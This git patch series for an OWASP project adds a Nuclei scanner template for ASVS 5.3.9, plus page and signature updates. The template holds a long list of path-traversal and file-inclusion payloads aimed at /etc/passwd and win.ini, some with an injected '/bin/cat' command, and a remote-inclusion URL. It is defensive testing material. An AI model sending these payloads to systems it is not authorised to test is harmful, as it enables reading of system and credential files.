From 88dbe46f73aa63ce6e7303f01c26852eab033591 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 3 Dec 2024 12:19:34 +0000 Subject: [PATCH 1/6] =?UTF-8?q?chore:=20sign=20templates=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates/9.1.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index a71233a..44dd7d7 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -45,4 +45,4 @@ ssl: - type: json json: - " .tls_version" -# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file +# digest: 490a0046304402205b53c3cab68f7b47834112a627baff87bd3b313b6d2b56c38b969787c5242ab7022011ff41ab8b4ad27670fa5f30be120e02469401cec098341105cbb946538a6aa2:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file From 782344796a444434dffc08fae0ac0297cb538a4d Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 6 Dec 2024 01:02:42 +0330 Subject: [PATCH 2/6] Create 5.3.9.yaml Based on requirement 5.3.9, this template checks whether the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks. Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.9.yaml | 143 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 templates/dast/5.3.9.yaml diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml new file mode 100644 index 0000000..8c68b94 --- /dev/null +++ b/templates/dast/5.3.9.yaml 
@@ -0,0 +1,143 @@
+id: ASVS-4-0-3-V5-3-9
+
+info:
+ name: ASVS 5.3.9 Check
+ author: AmirHossein Raeisi
+ severity: high
+ classification:
+ cwe-id: CWE-829
+ reference:
+ - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+ - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
+ - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
+ - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
+ - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
+ tags: asvs,5.3.9
+ description: |
+ Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
+ metadata:
+ max-request: 90
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ LFI-RFI:
+ # LFI (Linux)
+ - '/etc/passwd'
+ - '../etc/passwd'
+ - '../../etc/passwd'
+ - '../../../etc/passwd'
+ - '/../../../../etc/passwd'
+ - '../../../../../../../../../etc/passwd'
+ - '../../../../../../../../etc/passwd'
+ - '../../../../../../../etc/passwd'
+ - '../../../../../../etc/passwd'
+ - '../../../../../etc/passwd'
+ - '../../../../etc/passwd'
+ - '../../../etc/passwd'
+ - '../../../etc/passwd%00'
+ - '../../../../../../../../../../../../etc/passwd%00'
+ - '../../../../../../../../../../../../etc/passwd'
+ - '/../../../../../../../../../../etc/passwd^^'
+ - '/../../../../../../../../../../etc/passwd'
+ - '/./././././././././././etc/passwd'
+ - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
+ - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
+ - '/..\../..\../..\../..\../..\../..\../etc/passwd'
+ - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
+ - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+ - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+ - '%252e%252e%252fetc%252fpasswd'
+ - '%252e%252e%252fetc%252fpasswd%00'
+ - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
+ - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
+ - '....//....//etc/passwd'
+ - '..///////..////..//////etc/passwd'
+ - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
+ - '%0a/bin/cat%20/etc/passwd'
+ - '%00/etc/passwd%00'
+ - '%00../../../../../../etc/passwd'
+ - '/../../../../../../../../../../../etc/passwd%00.jpg'
+ - '/../../../../../../../../../../../etc/passwd%00.html'
+ - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
+ - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '\\'/bin/cat%20/etc/passwd\\''
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ # LFI (Windows)
+ - '\WINDOWS\win.ini'
+ - '../../windows/win.ini'
+ - '....//....//windows/win.ini'
+ - '../../../../../windows/win.ini'
+ - '/..///////..////..//////windows/win.ini'
+ - '/../../../../../../../../../windows/win.ini'
+ - './../../../../../../../../../../windows/win.ini'
+ - '..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '\WINDOWS\win.ini%00'
+ - '\WINNT\win.ini'
+ - '\WINNT\win.ini%00'
+ - 'windows/win.ini%00'
+ - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
+ - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
+ - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
+ - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
+ - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
+ - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
+ - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+ - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
+ - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+ - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
+ - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
+ - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
+ - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+ - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
+ - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+ - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
+ - 
'%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + # RFI + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{LFI-RFI}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" From 771702dba3520db4bb9c925b66298058cb08d175 Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 5 Dec 2024 21:34:49 +0000 Subject: [PATCH 3/6] =?UTF-8?q?chore:=20sign=20templates=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates/9.1.3.yaml | 2 +- templates/dast/5.3.9.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index 44dd7d7..31facb1 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -45,4 +45,4 @@ ssl: - type: json json: - " .tls_version" -# digest: 490a0046304402205b53c3cab68f7b47834112a627baff87bd3b313b6d2b56c38b969787c5242ab7022011ff41ab8b4ad27670fa5f30be120e02469401cec098341105cbb946538a6aa2:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file +# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml index 8c68b94..d87880d 100644 --- a/templates/dast/5.3.9.yaml 
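Review bot: `mode: multiple` in the `fuzzing` rule puts the payload into every query parameter of the same request (the inline comment says as much), so a URL that also carries a routing, token or paging parameter may be rejected before the file-handling code runs, and the template then reports nothing for an endpoint it never really exercised. Fuzzing one parameter per request with `mode: single` keeps the other values intact and makes a clean result more trustworthy as ASVS 5.3.9 evidence. The RFI payload and the last matcher also depend on `rfi.txt` on snbig.github.io continuing to serve what is presumably the marker `d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a`; a comment above that payload, e.g. `# rfi.txt must contain the UUID matched below; if the host is unreachable, RFI is untested`, would make the dependency visible. `'../../../etc/passwd'` appears twice under `# LFI (Linux)` and one copy can go.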
+++ b/templates/dast/5.3.9.yaml @@ -141,3 +141,4 @@ http: part: body words: - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" +# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file From bee479b8c435e0665e181c31df60497fd4304ac5 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 13 Dec 2024 12:06:12 +0330 Subject: [PATCH 4/6] Update index.md Signed-off-by: Hamed Salimian --- index.md | 31 ++++++++++++++++++++++++++++--- 1 file changed, 28 insertions(+), 3 deletions(-) diff --git a/index.md b/index.md index 2f02e06..e96ddf9 100644 --- a/index.md +++ b/index.md 
@@ -2,18 +2,43 @@ layout: col-sidebar title: OWASP ASVS Security Evaluation Templates with Nuclei -tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity +tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest level: 2 type: tool pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- -This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. The templates and user interface will be tested for accuracy and usability, and once finalized, they will be made available for use. User feedback and usage of the templates and user interface will be monitored and analyzed, and updates will be made to the templates and user interface based on this feedback and usage. Finally, the project will be documented for future reference. 
+[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -It's important to note that Since the implementation methods and frameworks used in web application design are very diverse, in this project, we will consider the existing best practice designs and develop nuclei templates based on them. +

+ +

+ +# OWASP ASVS Security Evaluation Templates with Nuclei + + +This project aims to develop [Nuclei](https://github.com/projectdiscovery/nuclei) templates for evaluating OWASP Application Security Verification Standard ([ASVS](https://owasp.org/www-project-application-security-verification-standard/)) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. + + The goal is to provide security professionals with an easy-to-use set of tools to test their web applications and identify potential vulnerabilities. +#### It's important to note that: +- Since the implementation methods and frameworks used in web application design are very diverse, in this project we will consider the existing best practice designs and develop nuclei templates based on them :) +- Also while these Nuclei templates are designed to help automate the process of evaluating web applications against ASVS requirements, they should not be considered a substitute for manual testing or other security best practices. +- Some templates are developed for a limited or specific scenario and should be modified and perfected according to the needs of the evaluator/user. ## Licensing [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. + +## Contributing + +Contributions to this repository are welcome and encouraged. 
If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +#### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) From 9607835c27fdd20c20a2080164f994dec1357862 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 13 Dec 2024 12:44:56 +0330 Subject: [PATCH 5/6] Update info.md Signed-off-by: Hamed Salimian --- info.md | 26 ++++++++++++-------------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/info.md b/info.md index 4abe302..2a62776 100644 --- a/info.md +++ b/info.md 
@@ -1,23 +1,21 @@ -### Project Information -* [Incubator Project](#) -* [Version 0.0.0](#) +### Source in Github +* [🏡 Homepage](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +* [📝 Templates](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/tree/main/templates) +* [🎯 Vulnerable Pages](https://github.com/Snbig/Vulnerable-Pages) -### Classification -* Tool - -### Audience -* Defender -* Breaker +### Project Classification +* Incubator Project +* Defender +* Breaker ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) ### Statistics -* [Daily Project Stats](#) - -### Code Repository -* [repo](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +[![Commits](https://img.shields.io/github/commit-activity/m/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fcommits%2Fmain%2F)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/commits/main/) ### Change Log -* [changes](#) +[![Open PRs](https://img.shields.io/github/issues-pr/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls) + +[![Closed PRs](https://img.shields.io/github/issues-pr-closed/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls%3Fq%3Dis%253Apr%2Bis%253Aclosed)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls?q=is%3Apr+is%3Aclosed) From b528a576de80deafa8e335da99fb87e93401cdd4 Mon Sep 17 00:00:00 2001 
From: Hamed Salimian Date: Fri, 13 Dec 2024 12:54:24 +0330 Subject: [PATCH 6/6] Update index.md Signed-off-by: Hamed Salimian --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index e96ddf9..76adef8 100644 --- a/index.md +++ b/index.md @@ -8,10 +8,10 @@ type: tool pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- - [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) +![Github stars ASVS](https://img.shields.io/github/stars/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=social)